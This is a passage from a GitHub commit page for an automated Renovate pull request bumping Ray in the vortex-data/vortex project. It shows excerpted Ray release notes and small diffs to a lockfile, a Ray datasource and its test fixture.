- Fixed HAProxy reliability issues, including config race conditions, draining guards, and platform compatibility edge cases, improving stability in production rollouts. ([#61120](https://redirect.github.com/ray-project/ray/issues/61120), [#60955](https://redirect.github.com/ray-project/ray/issues/60955))
- Fixed autoscaling correctness issues that could cause runaway scaling or delayed reactions, including feedback-loop regressions, streaming scale-down behavior, and wall-clock delay handling. ([#61731](https://redirect.github.com/ray-project/ray/issues/61731), [#61920](https://redirect.github.com/ray-project/ray/issues/61920), [#62331](https://redirect.github.com/ray-project/ray/issues/62331), [#61844](https://redirect.github.com/ray-project/ray/issues/61844), [#60613](https://redirect.github.com/ray-project/ray/issues/60613))
- Fixed high-percentile latency regression in request routing and queue-length accounting, reducing tail-latency spikes under load. ([#61755](https://redirect.github.com/ray-project/ray/issues/61755))
- Fixed replica-state and health-state edge cases during migration and ingress transitions, preventing false errors and unhealthy/healthy misreporting. ([#60365](https://redirect.github.com/ray-project/ray/issues/60365), [#61818](https://redirect.github.com/ray-project/ray/issues/61818), [#62213](https://redirect.github.com/ray-project/ray/issues/62213))
- Fixed chained upstream actor-failure handling so request failures are attributed correctly and no longer hang when upstream deployments die mid-chain. ([#61758](https://redirect.github.com/ray-project/ray/issues/61758), [#62147](https://redirect.github.com/ray-project/ray/issues/62147))
- Fixed HTTP status classification for client disconnects after successful responses, improving accuracy of error-rate monitoring and alerting. ([#61396](https://redirect.github.com/ray-project/ray/issues/61396))

##### 📖 Documentation:

- Added `AsyncInferenceAutoscalingPolicy` documentation and clarified Serve performance guidance for HAProxy and inter-deployment gRPC use cases. ([#61086](https://redirect.github.com/ray-project/ray/issues/61086), [#61386](https://redirect.github.com/ray-project/ray/issues/61386))
- Updated scheduling and configuration docs, including replica scheduling guidance and a catalog of Serve environment variables, so operators can tune deployments with less guesswork. ([#60922](https://redirect.github.com/ray-project/ray/issues/60922), [#60807](https://redirect.github.com/ray-project/ray/issues/60807))
- Clarified multiplexing and async behavior docs (including model pre-warming constraints and request-cancel semantics) to prevent common integration mistakes. ([#61842](https://redirect.github.com/ray-project/ray/issues/61842), [#62280](https://redirect.github.com/ray-project/ray/issues/62280))

##### 🏗 Architecture refactoring:

- Refactored deployment-state execution to skip unnecessary steady-state per-tick work, lowering control-loop churn and creating cleaner hooks for future scheduling logic.
([#&#8203;60840](https://redirect.github.com/ray-project/ray/issues/60840))
- Moved autoscaling metric aggregation into Cython-backed paths and added focused controller benchmarking, giving a stronger performance baseline for future Serve controller changes. ([#&#8203;58892](https://redirect.github.com/ray-project/ray/issues/58892), [#&#8203;61368](https://redirect.github.com/ray-project/ray/issues/61368))
- Simplified internal structure by migrating shared internals away from private modules and consolidating replica abstractions, reducing coupling and maintenance complexity. ([#&#8203;60849](https://redirect.github.com/ray-project/ray/issues/60849), [#&#8203;61363](https://redirect.github.com/ray-project/ray/issues/61363), [#&#8203;60198](https://redirect.github.com/ray-project/ray/issues/60198))

#### Ray Train

##### 🎉 New Features

- Elastic training: core capability, user guide, release tests, multi-host TPU, telemetry ([#&#8203;60721](https://redirect.github.com/ray-project/ray/issues/60721), [#&#8203;61115](https://redirect.github.com/ray-project/ray/issues/61115), [#&#8203;61133](https://redirect.github.com/ray-project/ray/issues/61133), [#&#8203;61299](https://redirect.github.com/ray-project/ray/issues/61299), [#&#8203;61267](https://redirect.github.com/ray-project/ray/issues/61267))
- Add HF TRL (Transformer Reinforcement Learning) example ([#&#8203;61627](https://redirect.github.com/ray-project/ray/issues/61627))
- Add Tensor Parallel templates for DeepSpeed AutoTP and DTensor ([#&#8203;60160](https://redirect.github.com/ray-project/ray/issues/60160), [#&#8203;60158](https://redirect.github.com/ray-project/ray/issues/60158))
- Add `status` attribute to `ReportedCheckpoint` ([#&#8203;61684](https://redirect.github.com/ray-project/ray/issues/61684))
- Richer Train run metadata ([#&#8203;59186](https://redirect.github.com/ray-project/ray/issues/59186))
- Add timers for Train worker initialization ([#&#8203;60870](https://redirect.github.com/ray-project/ray/issues/60870))
- Configure `torchft` environment ([#&#8203;61156](https://redirect.github.com/ray-project/ray/issues/61156))

##### 💫 Enhancements

- Register training resources with `AutoscalingCoordinator` in `FixedScalingPolicy` ([#&#8203;61703](https://redirect.github.com/ray-project/ray/issues/61703))
- Decouple `datasets` field from `TrainRunContext` ([#&#8203;61953](https://redirect.github.com/ray-project/ray/issues/61953))
- Log warning for `checkpoint_upload_fn` when slow ([#&#8203;61720](https://redirect.github.com/ray-project/ray/issues/61720))
- Fix `StateManagerCallback` to accept datasets explicitly ([#&#8203;62042](https://redirect.github.com/ray-project/ray/issues/62042))
- Make train run abortable during `before_controller_shutdown` ([#&#8203;61816](https://redirect.github.com/ray-project/ray/issues/61816))
- Graceful abort catches all `RayActorError` ([#&#8203;61375](https://redirect.github.com/ray-project/ray/issues/61375))
- Refactor checkpoint and `sync_actor` to use `wait_with_logging` ([#&#8203;61063](https://redirect.github.com/ray-project/ray/issues/61063))
- Unwrap `UserExceptionWithTraceback` in `WorkerGroupError.worker_failures` ([#&#8203;61153](https://redirect.github.com/ray-project/ray/issues/61153))

##### 🔨 Fixes

- Fix v2 `PlacementGroupCleaner` zombie actor ([#&#8203;61756](https://redirect.github.com/ray-project/ray/issues/61756))
- Fix checkpoint paths for multinode run ([#&#8203;61471](https://redirect.github.com/ray-project/ray/issues/61471))
- Abort cancels validation tasks with deterministic resumption ([#&#8203;61510](https://redirect.github.com/ray-project/ray/issues/61510))
- Fix deepspeed finetune release test ([#&#8203;61266](https://redirect.github.com/ray-project/ray/issues/61266))

##### 📖 Documentation

- Add section on async validation with experiment tracking ([#&#8203;62104](https://redirect.github.com/ray-project/ray/issues/62104))
- Add section on when to use async validation ([#&#8203;61702](https://redirect.github.com/ray-project/ray/issues/61702))

#### Ray Tune

##### 💫 Enhancements

- Remove deprecated `Logger` interface and `logger_creator` ([#&#8203;61181](https://redirect.github.com/ray-project/ray/issues/61181))

##### 🔨 Fixes

- Fix PBT trial order when `NaN` values are present ([#&#8203;57160](https://redirect.github.com/ray-project/ray/issues/57160))

#### Ray LLM

##### 🎉 New Features

- Replace `PDProxyServer` with decode-as-orchestrator PD architecture ([#&#8203;62076](https://redirect.github.com/ray-project/ray/issues/62076))
- Introduce DP group fault tolerance for WideEP deployments ([#&#8203;61480](https://redirect.github.com/ray-project/ray/issues/61480))
- SGLang engine: streaming chat/completions, tokenize/detokenize, embeddings, multi-GPU TP/PP ([#&#8203;61236](https://redirect.github.com/ray-project/ray/issues/61236), [#&#8203;61446](https://redirect.github.com/ray-project/ray/issues/61446), [#&#8203;61159](https://redirect.github.com/ray-project/ray/issues/61159), [#&#8203;61201](https://redirect.github.com/ray-project/ray/issues/61201), [#&#8203;62221](https://redirect.github.com/ray-project/ray/issues/62221))
- Add `bundle_per_worker` config for simpler placement group setup ([#&#8203;59903](https://redirect.github.com/ray-project/ray/issues/59903))
- Separate Data and Serve LLM dashboards with improved panel visibility ([#&#8203;61037](https://redirect.github.com/ray-project/ray/issues/61037), [#&#8203;62069](https://redirect.github.com/ray-project/ray/issues/62069))

##### 💫 Enhancements

- Promote Data LLM and Serve LLM APIs to beta ([#&#8203;61249](https://redirect.github.com/ray-project/ray/issues/61249), [#&#8203;62054](https://redirect.github.com/ray-project/ray/issues/62054), [#&#8203;62223](https://redirect.github.com/ray-project/ray/issues/62223))
- Upgrade vLLM to 0.16.0, 0.17.0, and 0.18.0 ([#&#8203;61389](https://redirect.github.com/ray-project/ray/issues/61389),
[#&#8203;61598](https://redirect.github.com/ray-project/ray/issues/61598), [#&#8203;61952](https://redirect.github.com/ray-project/ray/issues/61952))
- Upgrade NIXL to v1.0.0 and fix tensor transport issues ([#&#8203;61991](https://redirect.github.com/ray-project/ray/issues/61991))
- Unify duplicated `PlacementGroup` config schemes ([#&#8203;62241](https://redirect.github.com/ray-project/ray/issues/62241))
- Decouple Serve LLM ingress from vLLM protocol models ([#&#8203;61931](https://redirect.github.com/ray-project/ray/issues/61931))
- Set download task `num_cpus=0` to reduce contention on low-CPU machines ([#&#8203;61191](https://redirect.github.com/ray-project/ray/issues/61191))
- SGLangServer cleanup and replace `format_messages_to_prompt` with `_build_chat_messages` ([#&#8203;61117](https://redirect.github.com/ray-project/ray/issues/61117), [#&#8203;61372](https://redirect.github.com/ray-project/ray/issues/61372))

##### 🔨 Fixes

- Fix duplicate `data: [DONE]` in streaming SSE responses ([#&#8203;62246](https://redirect.github.com/ray-project/ray/issues/62246))
- Fix `enable_log_requests=False` not forwarded to vLLM `AsyncLLM` ([#&#8203;60824](https://redirect.github.com/ray-project/ray/issues/60824))
- Fix `OpenAiIngress` scale-to-zero when all models set `min_replicas=0` ([#&#8203;60836](https://redirect.github.com/ray-project/ray/issues/60836))
- Handle missing state attributes from vLLM's task-conditional `init_app_state` ([#&#8203;60812](https://redirect.github.com/ray-project/ray/issues/60812))
- Fix NIXL side channel host for cross-node P/D disaggregation ([#&#8203;60817](https://redirect.github.com/ray-project/ray/issues/60817))
- Fix `trust_remote_code` download ([#&#8203;60344](https://redirect.github.com/ray-project/ray/issues/60344))
- Avoid deprecated `TRANSFORMERS_CACHE`; treat HuggingFace config load failure as non-fatal ([#&#8203;60854](https://redirect.github.com/ray-project/ray/issues/60854))
- Fix sequential batch processing in SGLangServer ([#&#8203;61189](https://redirect.github.com/ray-project/ray/issues/61189))

##### 📖 Documentation

- Update data parallel attention documentation ([#&#8203;61706](https://redirect.github.com/ray-project/ray/issues/61706))
- Add custom tokenizer example ([#&#8203;61098](https://redirect.github.com/ray-project/ray/issues/61098))
- Add C/C++ binaries incompatibility workaround ([#&#8203;62110](https://redirect.github.com/ray-project/ray/issues/62110))

#### Ray RLlib

##### 💫 Enhancements

- Connector/batching optimizations: ndarray fast paths, direct env step pipeline, batch reuse ([#&#8203;61320](https://redirect.github.com/ray-project/ray/issues/61320), [#&#8203;61255](https://redirect.github.com/ray-project/ray/issues/61255), [#&#8203;61256](https://redirect.github.com/ray-project/ray/issues/61256), [#&#8203;61259](https://redirect.github.com/ray-project/ray/issues/61259), [#&#8203;61144](https://redirect.github.com/ray-project/ray/issues/61144))
- Unify default encoders for all algorithms ([#&#8203;60302](https://redirect.github.com/ray-project/ray/issues/60302))
- Toggle eval/train mode in `TorchRLModule` forward passes ([#&#8203;61985](https://redirect.github.com/ray-project/ray/issues/61985))
- Clean up offline prelearner and unit testing ([#&#8203;60632](https://redirect.github.com/ray-project/ray/issues/60632))
- Remove duplicate assignments in `AlgorithmConfig` ([#&#8203;61233](https://redirect.github.com/ray-project/ray/issues/61233))
- Remove legacy RLlib release tests ([#&#8203;59288](https://redirect.github.com/ray-project/ray/issues/59288))
- Add APPO example with Footsies environment ([#&#8203;59006](https://redirect.github.com/ray-project/ray/issues/59006))

##### 🔨 Fixes

- Support custom eval functions returning zero `eval_results`, `env_steps`, or `agent_steps` ([#&#8203;61563](https://redirect.github.com/ray-project/ray/issues/61563))
- Fix `PrioritizedEpisodeReplayBuffer` bug ([#&#8203;60065](https://redirect.github.com/ray-project/ray/issues/60065))
- Fix missing `LayerNorm` in `RLModuleSpec` ([#&#8203;61025](https://redirect.github.com/ray-project/ray/issues/61025))
- Fix evaluation in parallel to training ([#&#8203;60777](https://redirect.github.com/ray-project/ray/issues/60777))
- Fix `MultiAgentEpisode.env_t_to_agent_t` ([#&#8203;60319](https://redirect.github.com/ray-project/ray/issues/60319))
- Fix default metric during eval ([#&#8203;61590](https://redirect.github.com/ray-project/ray/issues/61590))
- Fix incorrect log value of environment steps sampled/trained ([#&#8203;56599](https://redirect.github.com/ray-project/ray/issues/56599))
- Prevent `torch_learner.py` crash under parameter-freezing edge cases ([#&#8203;62158](https://redirect.github.com/ray-project/ray/issues/62158))

#### Ray Core

##### 🎉 New Features

- Resource isolation: pressure-based memory monitor, time-based killing, cgroup constraints ([#&#8203;61361](https://redirect.github.com/ray-project/ray/issues/61361), [#&#8203;61323](https://redirect.github.com/ray-project/ray/issues/61323), [#&#8203;61097](https://redirect.github.com/ray-project/ray/issues/61097), [#&#8203;61210](https://redirect.github.com/ray-project/ray/issues/61210), [#&#8203;61297](https://redirect.github.com/ray-project/ray/issues/61297), [#&#8203;59365](https://redirect.github.com/ray-project/ray/issues/59365), [#&#8203;59368](https://redirect.github.com/ray-project/ray/issues/59368), [#&#8203;60752](https://redirect.github.com/ray-project/ray/issues/60752))
- IPPR: add `ResizeRayletResourceInstances` to GCS/Python client, schema/status models, KubeRay provider ([#&#8203;61654](https://redirect.github.com/ray-project/ray/issues/61654), [#&#8203;61666](https://redirect.github.com/ray-project/ray/issues/61666), [#&#8203;61803](https://redirect.github.com/ray-project/ray/issues/61803), [#&#8203;61814](https://redirect.github.com/ray-project/ray/issues/61814))
- Add `PlatformEvent` proto and placement group events in one-event framework
([#&#8203;61701](https://redirect.github.com/ray-project/ray/issues/61701), [#&#8203;60449](https://redirect.github.com/ray-project/ray/issues/60449))
- Add Nvidia B300 support ([#&#8203;60753](https://redirect.github.com/ray-project/ray/issues/60753))
- Add UV support for Ray Client mode ([#&#8203;60868](https://redirect.github.com/ray-project/ray/issues/60868))
- Add `Percentile` metric type backed by quadratic histogram ([#&#8203;61148](https://redirect.github.com/ray-project/ray/issues/61148))
- Expose `fallback_strategy` in `TaskInfoEntry` and `ActorTableData` ([#&#8203;60659](https://redirect.github.com/ray-project/ray/issues/60659))
- Add submission job proto changes ([#&#8203;60857](https://redirect.github.com/ray-project/ray/issues/60857))
- Add TPU util for ready multi-host slice count; simplify elastic TPU scaling ([#&#8203;61300](https://redirect.github.com/ray-project/ray/issues/61300), [#&#8203;62141](https://redirect.github.com/ray-project/ray/issues/62141))
- Introduce per-node level temp-dir ([#&#8203;60761](https://redirect.github.com/ray-project/ray/issues/60761))
- Make `ray.put()` generic: `put(value: R) -> ObjectRef[R]` ([#&#8203;60995](https://redirect.github.com/ray-project/ray/issues/60995))
- Add Python 3.14 support for recursion limit handling ([#&#8203;58459](https://redirect.github.com/ray-project/ray/issues/58459))

##### 💫 Enhancements

- Upgrade `cloudpickle` to 3.1.2, gRPC to v1.58.0, protobuf to 3.20.3 ([#&#8203;60317](https://redirect.github.com/ray-project/ray/issues/60317), [#&#8203;61499](https://redirect.github.com/ray-project/ray/issues/61499), [#&#8203;60736](https://redirect.github.com/ray-project/ray/issues/60736))
- Multiple gRPC connections for improved object transfer throughput, enabled by default ([#&#8203;61121](https://redirect.github.com/ray-project/ray/issues/61121), [#&#8203;61440](https://redirect.github.com/ray-project/ray/issues/61440))
- Improve `pg.ready()` performance via async GCS RPC; fix deadlocks ([#&#8203;60657](https://redirect.github.com/ray-project/ray/issues/60657), [#&#8203;62086](https://redirect.github.com/ray-project/ray/issues/62086))
- RDT: non-torch transfers, PyTorch storage caching, metadata caching, NIXL agent reuse ([#&#8203;61081](https://redirect.github.com/ray-project/ray/issues/61081), [#&#8203;60999](https://redirect.github.com/ray-project/ray/issues/60999), [#&#8203;60689](https://redirect.github.com/ray-project/ray/issues/60689), [#&#8203;60602](https://redirect.github.com/ray-project/ray/issues/60602))
- Cache `ActorHandle.__hash__` and fix `__eq__` correctness ([#&#8203;61638](https://redirect.github.com/ray-project/ray/issues/61638))
- Cache `find_gcs_addresses` ([#&#8203;61065](https://redirect.github.com/ray-project/ray/issues/61065))
- Optimize worker listener thread ([#&#8203;61353](https://redirect.github.com/ray-project/ray/issues/61353))
- Eliminate Python GCS client from state manager `get_all_node_info` ([#&#8203;61232](https://redirect.github.com/ray-project/ray/issues/61232))
- Loosen restriction on worker thread count ([#&#8203;62279](https://redirect.github.com/ray-project/ray/issues/62279))
- Sequence in-order actor tasks per concurrency group instead of globally ([#&#8203;61082](https://redirect.github.com/ray-project/ray/issues/61082))
- Prioritize killing workers that occupy large memory in OOM killer ([#&#8203;60330](https://redirect.github.com/ray-project/ray/issues/60330))
- Cap exponential backoff attempt number to prevent integer overflow ([#&#8203;61003](https://redirect.github.com/ray-project/ray/issues/61003))
- Replace deprecated threading APIs (`getName`/`setDaemon`) ([#&#8203;62153](https://redirect.github.com/ray-project/ray/issues/62153))
- Improve error handling for `@ray.remote`/`@ray.method` with `num_returns` ([#&#8203;59286](https://redirect.github.com/ray-project/ray/issues/59286))
- Convert `StopIteration` on non-generator functions to `RuntimeError` ([#&#8203;60521](https://redirect.github.com/ray-project/ray/issues/60521))
- Surface warnings for scheduling rate limits slowing task ramp-up ([#&#8203;61004](https://redirect.github.com/ray-project/ray/issues/61004))
- Periodically reload service account tokens; use `AuthenticationValidator` in sync server ([#&#8203;60778](https://redirect.github.com/ray-project/ray/issues/60778), [#&#8203;60779](https://redirect.github.com/ray-project/ray/issues/60779))
- Remove support for `local_mode` ([#&#8203;60647](https://redirect.github.com/ray-project/ray/issues/60647))
- Allow matching `worker_process_setup_hook` on re-entry ([#&#8203;61473](https://redirect.github.com/ray-project/ray/issues/61473))
- Reduce default event aggregator buffer size to avoid OOM ([#&#8203;60826](https://redirect.github.com/ray-project/ray/issues/60826))
- Suppress autoscaler action logs for read-only provider ([#&#8203;61732](https://redirect.github.com/ray-project/ray/issues/61732))
- Lazy subscription to node changes on non-driver workers ([#&#8203;61118](https://redirect.github.com/ray-project/ray/issues/61118))
- Tighten export symbol allowlists to prevent non-ray symbol leakage ([#&#8203;61298](https://redirect.github.com/ray-project/ray/issues/61298))
- Approximate USS from `memory_info` instead of calling `memory_full_info` ([#&#8203;60000](https://redirect.github.com/ray-project/ray/issues/60000))
- Dedicated IO context for `NodeManager` and `InternalKVManager` ([#&#8203;61002](https://redirect.github.com/ray-project/ray/issues/61002))
- Print gRPC peer address on GCS `HandleUnregisterNode`/`HandleDrainNode` ([#&#8203;62226](https://redirect.github.com/ray-project/ray/issues/62226), [#&#8203;62112](https://redirect.github.com/ray-project/ray/issues/62112))

##### 🔨 Fixes

- Fix task stuck when pop worker repeatedly fails ([#&#8203;60104](https://redirect.github.com/ray-project/ray/issues/60104))
- Fix `bool` env var parsing for `RAY_CGRAPH_overlap_gpu_communication` ([#&#8203;61421](https://redirect.github.com/ray-project/ray/issues/61421))
- Fix negative RUNNING task metric ([#&#8203;62070](https://redirect.github.com/ray-project/ray/issues/62070))
- Fix `OnNodeDead` to destroy all owned actors when owner node dies ([#&#8203;60669](https://redirect.github.com/ray-project/ray/issues/60669))
- Fix actor task queue blocked after cancelling head task ([#&#8203;60850](https://redirect.github.com/ray-project/ray/issues/60850))
- Fix `TASK_PROFILE_EVENT` aggregation for multiple phases ([#&#8203;61559](https://redirect.github.com/ray-project/ray/issues/61559))
- Fix double-counting in `WorkerPool::WarnAboutSize()` ([#&#8203;61246](https://redirect.github.com/ray-project/ray/issues/61246))
- Fix `TaskLifecycleEvent.node_id` using emitting node instead of executor ([#&#8203;61478](https://redirect.github.com/ray-project/ray/issues/61478))
- Fix `publisher_id` type mismatch in GCS pubsub ([#&#8203;61518](https://redirect.github.com/ray-project/ray/issues/61518))
- Fix `dataclass.asdict` with `None` in dashboard `list_jobs` API ([#&#8203;61033](https://redirect.github.com/ray-project/ray/issues/61033))
- Fix dashboard node head API dead node cache ([#&#8203;61185](https://redirect.github.com/ray-project/ray/issues/61185))
- Fix dashboard event agent for events without HTTP scheme ([#&#8203;60811](https://redirect.github.com/ray-project/ray/issues/60811))
- Fix Ray Actor typing for async methods ([#&#8203;60682](https://redirect.github.com/ray-project/ray/issues/60682))
- Fix autoscaler retry during k8s exceptions ([#&#8203;60658](https://redirect.github.com/ray-project/ray/issues/60658))
- Fix `ReadOnlyPro

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these updates again.
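One Ray Core enhancement in the notes above, capping the exponential backoff attempt number to prevent integer overflow, reflects a generally useful retry pattern: saturate the exponent rather than the computed delay. The sketch below is illustrative only; the function name, base delay, and cap are assumptions, not Ray's actual implementation.

```python
# Illustrative sketch of capped exponential backoff (not Ray's actual code).
# Left uncapped, 2 ** attempt grows without bound and can overflow a
# fixed-width integer in lower-level code; capping the attempt number
# bounds the computed delay instead.

def backoff_delay_ms(attempt: int, base_ms: int = 100, max_attempt: int = 10) -> int:
    """Return the retry delay, capping the exponent so the delay saturates."""
    capped = min(attempt, max_attempt)
    return base_ms * (2 ** capped)
```

With these assumed defaults, the delay doubles per attempt up to attempt 10 and then stays constant, so even attempt numbers in the thousands produce the same bounded delay.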
---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/vortex-data/vortex).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNDEuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE0MS4zIiwidGFyZ2V0QnJhbmNoIjoiZGV2ZWxvcCIsImxhYmVscyI6WyJjaGFuZ2Vsb2cvY2hvcmUiXX0=-->

---------

Signed-off-by: Robert Kruszewski <github@robertk.io>
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Robert Kruszewski <github@robertk.io>
1 parent ea31cc2 commit 69b3fc6

3 files changed: 26 additions & 21 deletions

File tree

uv.lock

Lines changed: 15 additions & 12 deletions
Some generated files are not rendered by default.

vortex-python/python/vortex/ray/datasource.py

Lines changed: 1 addition & 1 deletion
```diff
@@ -133,7 +133,7 @@ def _read_task(
         num_rows=num_rows,
         size_bytes=None,
         exec_stats=None,
-        input_files=paths,
+        input_files=tuple(paths),
     )

     def read() -> Iterable[pandas.DataFrame]:
```
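The one-line change above converts `input_files` from a list to a tuple. A plausible motivation (an assumption here; the diff itself does not state one) is that metadata shared across Ray tasks is safer as an immutable, hashable value. A minimal sketch, using a stand-in dataclass rather than Ray's actual `BlockMetadata`:

```python
# Why a tuple can be preferable to a list for a metadata field like
# `input_files`: tuples are immutable (callers can't mutate shared metadata
# in place) and hashable (usable in sets/dicts, cacheable). The class below
# is a hypothetical stand-in, not Ray's real BlockMetadata.
from dataclasses import dataclass

@dataclass(frozen=True)
class BlockMetadataSketch:
    input_files: tuple[str, ...]

paths = ["a.vortex", "b.vortex"]
meta = BlockMetadataSketch(input_files=tuple(paths))

# A frozen dataclass holding a tuple participates in hashing; the same
# dataclass holding the original list would raise TypeError on hash().
seen = {meta}

paths.append("c.vortex")  # mutating the source list...
assert meta.input_files == ("a.vortex", "b.vortex")  # ...doesn't leak into the metadata
```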

vortex-python/test/test_datasource.py

Lines changed: 10 additions & 8 deletions
```diff
@@ -14,13 +14,15 @@

 @pytest.fixture(scope="module")
 def ray_init():
-    # https://github.com/ray-project/ray/issues/53848#issuecomment-3056271943
-    ray.init(  # pyright: ignore[reportUnknownMemberType]
-        runtime_env={
-            "working_dir": None,
-            "excludes": [".git", ".venv"],
-        }
-    )
+    # Ray's uv_runtime_env_hook would auto-upload the working directory to
+    # workers, but vortex-python's compiled _lib extension exceeds Ray's
+    # 512 MiB upload limit. Disable the hook for these local-mode tests.
+    # (Ray 2.55 added a string-type validation that broke the previous
+    # `working_dir: None` workaround from ray-project/ray#53848.)
+    import ray._private.ray_constants as ray_constants
+
+    ray_constants.RAY_ENABLE_UV_RUN_RUNTIME_ENV = False
+    _ = ray.init()  # pyright: ignore[reportUnknownMemberType]
     yield None
     ray.shutdown()  # pyright: ignore[reportUnknownMemberType]

@@ -53,7 +55,7 @@ def test_vortex_datasource(ray_init, tmpdir_factory):  # pyright: ignore[reportU
     # Without an explicit sort, Ray may reorder rows *even within a single record batch*.
     ds = ds.sort("index")

-    tbl = pa.concat_tables(pa.Table.from_pydict(x) for x in ds.iter_batches())  # pyright: ignore[reportArgumentType]
+    tbl = pa.concat_tables(pa.Table.from_pydict(x) for x in ds.iter_batches())  # pyright: ignore[reportArgumentType, reportUnknownMemberType, reportUnknownVariableType]
     expected = pa.Table.from_pylist([record(x) for x in range(0, 10)], schema=tbl.schema)

     assert tbl == expected
```
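The fixture above flips a module-level flag before calling `ray.init()` and, being module-scoped, never restores it. The general pattern, temporarily overriding a library's module constant and restoring it on exit, can be sketched without Ray at all (the `fake_lib` namespace below is illustrative, standing in for `ray._private.ray_constants`):

```python
# Generic sketch of the flag-toggling pattern used in the fixture above:
# temporarily override a module-level constant and restore it on exit.
import contextlib
import types

# Hypothetical stand-in for a real module such as ray._private.ray_constants.
fake_lib = types.SimpleNamespace(RAY_ENABLE_UV_RUN_RUNTIME_ENV=True)

@contextlib.contextmanager
def flag_disabled(module, name):
    """Set `module.name` to False for the duration of the block, then restore it."""
    original = getattr(module, name)
    setattr(module, name, False)
    try:
        yield
    finally:
        setattr(module, name, original)

with flag_disabled(fake_lib, "RAY_ENABLE_UV_RUN_RUNTIME_ENV"):
    assert fake_lib.RAY_ENABLE_UV_RUN_RUNTIME_ENV is False
# Outside the block the original value is back.
assert fake_lib.RAY_ENABLE_UV_RUN_RUNTIME_ENV is True
```

For a module-scoped pytest fixture like the one in the diff, setting the flag once without restoring it is usually fine; the restore-on-exit variant matters when other tests in the same process need the default behavior.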
